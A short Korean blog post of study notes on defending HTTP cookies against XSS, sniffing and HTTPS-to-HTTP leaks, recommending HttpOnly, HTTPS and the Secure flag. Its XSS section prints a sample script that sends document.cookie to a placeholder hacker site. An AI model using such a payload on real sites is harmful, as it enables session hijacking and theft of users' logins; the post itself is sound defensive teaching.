http통신의 공격방지 방법들
·2분 읽기·조회 5
서론
항상 일하다가, 공부하다가 알게되어 자료를 찾아보지만 금세 잊어버려 기억에 남지 않으니 따로 정리할 목적으로 작성 한다.
내용
XSS (Cross Site Scripting)
공격 방법
<script> location.href = '해커사이트주소?cookie=' + document.cookie </script>
이런식으로 src링크를 이용해 사이트에 접속하게 되면, url의 query문에 쿠키정보가 모두 넘어가게 된다.
방지 방법
- Http Only
쿠키의 설정 중 하나인 Http Only 를 설정하면, http 통신으로만 쿠키에 접근이 가능하게 되며, 브라우저에서 쿠키에 접근을 할 수 없게 됩니다.
스니핑 - 네트워크 계층에서 패킷을 탈취하는 방법
방지 방법
- SSL
SSL암호화가 적용된 HTTPS를 사용함으로써 쿠키를 포함한 http통신이 모두 암호화되어 통신하게 하면 스니핑을 방지 할 수 있습니다.
개발자 부주의로 인한 https -> http 통신
방지 방법
- secure
쿠키의 설정 중 하나인 secure 를 설정 하면, https 통신이 아닌경우 쿠키를 전송하지 않습니다.
댓글 0
불러오는 중...